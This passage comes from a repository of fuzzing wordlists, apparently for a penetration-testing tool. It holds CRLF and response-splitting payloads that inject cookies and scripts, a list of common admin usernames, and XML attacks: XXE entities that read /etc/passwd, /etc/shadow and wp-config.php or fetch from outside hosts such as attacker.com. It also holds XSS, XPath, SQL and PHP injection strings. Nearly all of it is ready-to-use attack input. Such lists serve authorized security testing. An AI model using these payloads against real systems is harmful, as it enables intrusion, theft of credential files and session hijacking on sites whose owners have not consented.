187 | en%0aContent-Length%3A%200%0a%0aHTTP%2F1.1%20200%20OK%0aDate%3A%20Fri%2C%2006%20Mar%202016%2000%3A07%3A47%20GMT%0aContent-Type%3A%20text%2Fhtml%3Bcharset%3DISO-8859-1%0aContent-Length%3A%2040%0a%3Chtml%3E%3Cbody%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E
188 | en%0aContent-Length%3A%200%0a%0aHTTP%2F1.1%20200%20OK%0aDate%3A%20Fri%2C%2006%20Mar%202016%2000%3A07%3A47%20GMT%0aLast-Modified%3A%20Fri%2C%2006%20Mar%202017%2000%3A07%3A47%20GMT%0aContent-Type%3A%20text%2Fhtml%3Bcharset%3DISO-8859-1%0aContent-Length%3A%2040%0a%3Chtml%3E%3Cbody%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E
189 | en%0d%0aContent-Length%3A%200%0d%0d%0a%0aHTTP%2F1.1%20200%20OK%0d%0aDate%3A%20Fri%2C%2006%20Mar%202016%2000%3A07%3A47%20GMT%0d%0aContent-Type%3A%20text%2Fhtml%3Bcharset%3DISO-8859-1%0d%0aContent-Length%3A%2040%0d%0a%3Chtml%3E%3Cbody%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E
190 | en%250AContent-Length%253A%25200%250A%250AHTTP%252F1.1%2520200%2520OK%250AContent-Type%253A%2520text%252Fhtml%250AContent-Length%253A%252048%250A%253Chtml%253E%253Cscript%253Edocument.cookie%28%29%253B%253C%252Fscript%253E%253C%252Fhtml%253E
191 | foobar%0d%0aCONTENT-LENGTH:%200%0d%0d%0a%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aCONTENT-LENGTH:%2025%0d%0d%0a%0a<html>Hacked</html>
192 | foobar%0dCONTENT-LENGTH:%200%0d%0dHTTP/1.1%20200%20OK%0dContent-Type:%20text/html%0dCONTENT-LENGTH:%2025%0d%0d<html>Hacked</html>
193 | foobar%20%0d%0aContent-Length%3A%200%20%0d%0aHTTP%2F1.1%20200%20OK%20%0d%0aContent-Type%3A%20text%2Fhtml%20%0d%0aLast-Modified%3A%20Mon%2C%2027%20Oct%202016%2014%3A50%3A18%20GMT%20%0d%0aContent-Length%3A%2045%20%0d%0aHacked%0d%0a
194 | foobar%20%0dContent-Length%3A%200%20%0dHTTP%2F1.1%20200%20OK%20%0dContent-Type%3A%20text%2Fhtml%20%0dLast-Modified%3A%20Mon%2C%2027%20Oct%202016%2014%3A50%3A18%20GMT%20%0dContent-Length%3A%2045%20%0dHacked%0d
195 | ###General Vectors###
196 | HTTP/1.1+200+OK%0aContent-Type:+text/html%0aContent-Length:+132%0aContent-Encoding:+deflate%0a%0aD0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3SUUnUUUwCiudIbEAtwwwEt33sGDttwGDDDGG03sDGGwGGtDtt33333sG03333sDDdFPcOKwGWoSsgkwoemUcMOKwGWoS4
197 | HTTP/1.1+200+OK%0d%0aContent-Type:+text/html%0d%0aContent-Length:+132%0d%0aContent-Encoding:+deflate%0d%0d%0a%0aD0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3SUUnUUUwCiudIbEAtwwwEt33sGDttwGDDDGG03sDGGwGGtDtt33333sG03333sDDdFPcOKwGWoSsgkwoemUcMOKwGWoS4
198 | \nINJECTX
199 | \nINJECTX\n\n
200 | \n\nINJECTX
201 | \n\rINJECTX
202 | \n\rINJECTX\n\r
203 | \n\rINJECTX\n\r\n\r
204 | \r\n
205 | %0dSet-Cookie: INJECTX=INJECTX
206 | %0aSet-Cookie: INJECTX=INJECTX
207 | %0d%0a%20Set-Cookie: INJECTX=INJECTX
208 | %0aSet-Cookie: INJECTX=INJECTX%0aX:INJECTX
209 | %0dSet-Cookie: INJECTX=INJECTX%0aX:INJECTX
210 | %0d%0aSet-Cookie: INJECTX=x%0aX:INJECTX
211 | %0d%0a%20Set-Cookie: x=x%0aX:INJECTX
212 | %E5%98%8A%E5%98%8DSet-Cookie: INJECTX=INJECTX
213 | //www.sn1persecurity.com/%2E%2E%0aSet-Cookie: INJECTX=INJECTX
214 | //www.sn1persecurity.com/%2E%2E%0d%0a%20Set-Cookie: INJECTX=INJECTX
215 | //www.sn1persecurity.com/%2E%2E%0dSet-Cookie: INJECTX=INJECTX
216 | +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++set-Cookie: INJECTXXXXXXXXXX;
217 | INJECTX%0aSet-Cookie%3AINJECT%3DINJECTXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%3B%0aLocation%3Ahttp%3A%2F%2Fsn1persecurity.com%2F.testing%2Fiframe_injection.php%0a%0a
218 | INJECTX%0aSet-Cookie: INJECT=INJECTXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX;
219 | INJECTX%0d%0aSet-Cookie%3AINJECT%3DINJECTXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%3B%0d%0aLocation%3Ahttp%3A%2F%2Fsn1persecurity.com%2F.testing%2Fiframe_injection.php%0d%0d%0a%0a
220 | INJECTX%0dXTest%3AINJECTX
221 | %E5%98%8A%E5%98%8DSet-Cookie: %20INJECTX
222 | %E5%98%8A%E5%98%8Dcontent-type:text/html%E5%98%8A%E5%98%8Dlocation:%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%BCsvg/onload=alert%28innerHTML%29%E5%98%BE
223 | /test/%2e%2e/tr
224 | //////www.sn1persecurity.com/%2e%2e/tr
225 | %2fwww.sn1persecurity.com%2f%2e%2e/tr
226 | /%0aSet-Cookie: INJECTX%0aX:/%2e%2e/tr
227 | %2Fxxx:1%2F%0aX-XSS-Protection:0%0aContent-Type:text/html%0aContent-Length:39%0a%0a%3cscript%3ealert(INJECTX)%3c/script%3e%2F..%2F..%2F..%2F../
228 | <h1\>INJECTX</h1\>
229 | foo%00%0d%0abar
230 | foo%250d%250abar
231 | foo%%0d0d%%0a0abar
232 | %0dSet-Cookie: INJECTX=INJECTX
233 | %0aSet-Cookie: INJECTX=INJECTX
234 | %0d%0a%20Set-Cookie: INJECTX=INJECTX
235 | %0aSet-Cookie: INJECTX=INJECTX%0aX:INJECTX
236 | %0dSet-Cookie: INJECTX=INJECTX%0aX:INJECTX
237 | %0d%0aSet-Cookie: INJECTX=x%0aX:INJECTX
238 | %0d%0a%20Set-Cookie: x=x%0aX:INJECTX
239 | %E5%98%8A%E5%98%8DSet-Cookie: INJECTX=INJECTX
240 | //www.sn1persecurity.com/%2E%2E%0aSet-Cookie: x=INJECTX
241 | //www.sn1persecurity.com/%2E%2E%0d%0a%20Set-Cookie: x=INJECTX
242 | //www.sn1persecurity.com/%2E%2E%0dSet-Cookie: x=INJECTX
243 | INJECTX'"<>/%2e%2e
244 | INJECTX'"<>/%2e%2e/
245 | INJECTX'"<>
246 | INJECTX%27%22%3c%3e%2e%2e
247 | INJECTX%27%22%3c%3e%2e%2e/
248 | INJECTX/%2e%2e
249 | INJECTX/%2e%2e/
250 | %2e%2e/INJECTX/
251 | %2e%2e/INJECTX
252 | 


--------------------------------------------------------------------------------
/FuzzLists/usernames.txt:
--------------------------------------------------------------------------------
 1 | root
 2 | admin
 3 | test
 4 | guest
 5 | info
 6 | adm
 7 | mysql
 8 | user
 9 | administrator
10 | oracle
11 | ftp
12 | 


--------------------------------------------------------------------------------
/FuzzLists/xml-attacks.txt:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
 2 | <!DOCTYPE foo [<!ENTITY xxe7eb97 SYSTEM "file:///etc/passwd"> ]>
 3 | <!DOCTYPE foo [<!ENTITY xxe7eb97 SYSTEM "file:///c:/boot.ini"> ]>
 4 | <!DOCTYPE foo [<!ENTITY xxe46471 SYSTEM "http://crowdshield.com/.testing/rfi_vuln.txt"> ]>
 5 | <?xml version="1.0"?><methodCall><methodName>demo.sayHello</methodName><params></params></methodCall>
 6 | <?xml version="1.0"?><change-log><text>Hello World</text></change-log>
 7 | <?xml version="1.0"?><change-log><text>&quot;Hello World&quot;</text></change-log>
 8 | <?xml version="1.0"?><!DOCTYPE change-log[ <!ENTITY myEntity "World"> ]><change-log><text>Hello &myEntity;</text></change-log>
 9 | <?xml version="1.0"?><!DOCTYPE change-log[ <!ENTITY myEntity "World"><!ENTITY myQuote "&quot;"> ]><change-log><text>&myQuote;Hello &myEntity;&myQuote;</text></change-log>
10 | <!ENTITY systemEntity SYSTEM "robots.txt">
11 | <change-log> <text>&systemEntity;</text> </change-log>
12 | <?xml version="1.0"?> <!DOCTYPE change-log [ <!ENTITY systemEntity SYSTEM "robots.txt"> ]> <change-log> <text>&systemEntity;</text> </change-log>
13 | <?xml version="1.0"?> <!DOCTYPE change-log [ <!ENTITY systemEntity SYSTEM "../../../../boot.ini"> ]> <change-log> <text>&systemEntity;</text> </change-log>
14 | <?xml version="1.0"?> <!DOCTYPE change-log [ <!ENTITY systemEntity SYSTEM "robots.txt"> ]> <change-log> <text>&systemEntity;</text>; </change-log>
15 | <test> $lDOMDocument->textContent=<![CDATA[<]]>script<![CDATA[>]]>alert('XSS')<![CDATA[<]]>/script<![CDATA[>]]> </test>
16 | <?xml version="1.0"?><change-log><text><script>alert(1)</script></text></change-log>
17 | count(/child::node())
18 | x' or name()='username' or 'x'='y
19 | <name>','')); phpinfo(); exit;/*</name>
20 | <![CDATA[<script>var n=0;while(true){n++;}</script>]]>
21 | <![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
22 | <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
23 | <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foo>
24 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xxe;</foo>
25 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/passwd">]><foo>&xxe;</foo>
26 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/shadow">]><foo>&xxe;</foo>
27 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "https://crowdshield.com/.testing/rfi_vuln.txt">]><foo>&xxe;</foo>
28 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "http://sn1persecurity.com/.testing/rfi_vuln.txt">]><foo>&xxe;</foo>
29 | <xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>"
30 | <xml ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
31 | <xml SRC="https://crowdshield.com/.testing/rfi_vuln.txt" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
32 | <HTML xmlns:xss><?import namespace="xss" implementation="https://crowdshield.com/.testing/xss.html"><xss:xss>XSS</xss:xss></HTML>
33 | <xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
34 | <xml ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert('XSS')"&gt;</B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
35 | <xml SRC="https://crowdshield.com/.testing/xss.html" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
36 | <?xml version='1.0' standalone='no'?><!DOCTYPE foo [<!ENTITY % f5a30 SYSTEM "https://crowdshield.com/.testing/rfi_vuln.txt">%f5a30; ]>
37 | ‘
38 | “
39 | <?xml version="1.0"?> <!DOCTYPE change-log [ <!ENTITY systemEntity SYSTEM "../../../boot.ini" ]> <change-log> <text>&systemEntity;</text>; </change-log>
40 | <?xml version="1.0" encoding="utf-8"?><!DOCTYPE doc [<!ELEMENT test ANY ><!ENTITY xxe SYSTEM "php://filter/read-convert.base64-encode/resource=file:///C:/boot.ini" >]><doc><test>Contents of file: &xxe;</test></doc>
41 | <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [     <!ELEMENT foo ANY >  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo> 
42 | <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [     <!ELEMENT foo ANY >   <!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo>
43 | <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [     <!ELEMENT foo ANY >  <!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo> 
44 | <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [     <!ELEMENT foo ANY >   <!ENTITY xxe SYSTEM "https://crowdshield.com/.testing/rfi.txt" >]><foo>&xxe;</foo>
45 | "}}</script><script>alert(1);</script></body></html><!-- 
46 | }}</script>'"
47 | }}</script>'
48 | '}}</script>'
49 | '}}</script>"
50 | <?xml version="1.0" encoding="utf-16" standalone="yes"?><methodCall><methodName>pingback.ping</methodName><params><param><value><string>https://wordpress.org/</string></value></param><param><value><string>http://sn1persecurity.com</string></value></param></params></methodCall>
51 | <xml version="1.0"?><!DOCTYPE XXE [<!ELEMENT methodName ANY ><!ENTITY xxe SYSTEM "../../../../../../../etc/passwd">]><methodCall><methodName>&xxe</methodName></methodCall>
52 | <xml version="1.0"?><!DOCTYPE XXE [<!ELEMENT methodName ANY ><!ENTITY xxe SYSTEM "http://sn1persecurity.com/.testing/rfi_vuln.txt">]><methodCall><methodName>&xxe</methodName></methodCall>
53 | <xml version="1.0"?><!DOCTYPE XXE [<!ELEMENT methodName ANY ><!ENTITY xxe SYSTEM "https://crowdshield.com/.testing/rfi_vuln.txt">]><methodCall><methodName>&xxe</methodName></methodCall>
54 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]><foo>&xxe;</foo>
55 | <xml ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
56 | <xml SRC="xsstest.xml" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
57 | <HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>
58 | <?xml version="1.0" encoding="utf-8"?><!DOCTYPE doc [<!ELEMENT test ANY ><!ENTITY xxe SYSTEM "php://filter/read-convert.base64-encode/resource=file:///C:/htdocs/wordpress/wp-config.php" >]><doc><test>Contents of file: &xxe;</test></doc>
59 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo><?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow">]><foo>&xxe;</foo>
60 |  <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo> <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY >   <!ENTITY xxe SYSTEM "http://www.attacker.com/text.txt">]><foo>&xxe;</foo>
61 | }}</script><script>alert(1);</script></body></html><!-- 
62 | "}}</script>'
63 | }}</script>""'"
64 | <?xml version="1.0" standalone="yes"?><!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]><svg width="500px" height="40px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">&xxe;</svg>
65 | <?xml version="1.0" standalone="yes"?><!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]><svg width="500px" height="100px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-family="Verdana" font-size="16" x="10" y="40">&xxe;</text></svg>
66 | <![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
67 | <![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]>
68 | 
69 | 


--------------------------------------------------------------------------------
/FuzzLists/xss_escape_chars.txt:
--------------------------------------------------------------------------------
 1 | ' 
 2 | " 
 3 | ">
 4 | /'>
 5 | ')>
 6 | ")>
 7 | ">
 8 | '">
 9 | '>
10 | ; 
11 | 
12 | ') 
13 | ") 
14 | "); 
15 | \"+
16 | \"); 
17 | '>
18 | ">
19 | "/>
20 | '>
21 | \"
22 | \'
23 | \";
24 | ';
25 | #
26 | <!-- INJECTX
27 | // INJECTX
28 | /* INJECTX
29 | 
30 | 


--------------------------------------------------------------------------------
/FuzzLists/xss_find_inject.txt:
--------------------------------------------------------------------------------
1 | INJECTXXXXXXXXXXX
2 | INJECTXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
3 | INJECTXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX